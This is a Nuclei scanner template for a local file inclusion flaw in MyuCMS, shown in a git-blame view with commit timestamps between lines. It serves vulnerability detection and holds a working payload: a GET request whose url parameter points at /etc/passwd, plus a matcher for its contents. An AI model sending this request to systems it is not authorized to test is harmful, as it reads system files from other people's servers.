2021-04-09 21:40:57 +00:00
|
|
|
id: myucms-lfr
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-04-09 21:40:57 +00:00
|
|
|
info:
|
2022-07-27 20:17:31 +00:00
|
|
|
name: MyuCMS - Local File Inclusion
|
2021-04-09 21:40:57 +00:00
|
|
|
author: princechaddha
|
|
|
|
severity: high
|
2022-07-27 20:17:31 +00:00
|
|
|
description: MyuCMS is vulnerable to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://blog.csdn.net/yalecaltech/article/details/104908257
|
2022-07-27 20:17:31 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: myucms,lfi
|
2021-04-09 21:40:57 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-04-09 21:40:57 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2021-04-09 21:40:57 +00:00
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2021-07-24 21:35:55 +00:00
|
|
|
- "root:.*:0:0:"
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 490a0046304402205638efd6e3ab9f6927e36ac539eb3ad4a391704e21c4a104fdb6e93f904868a302202158a08b652876505928dff8a7edccac1a3c41d07ed5dcda40f55e4f5c02adc0:922c64590222798bb761d5b6d8e72950
|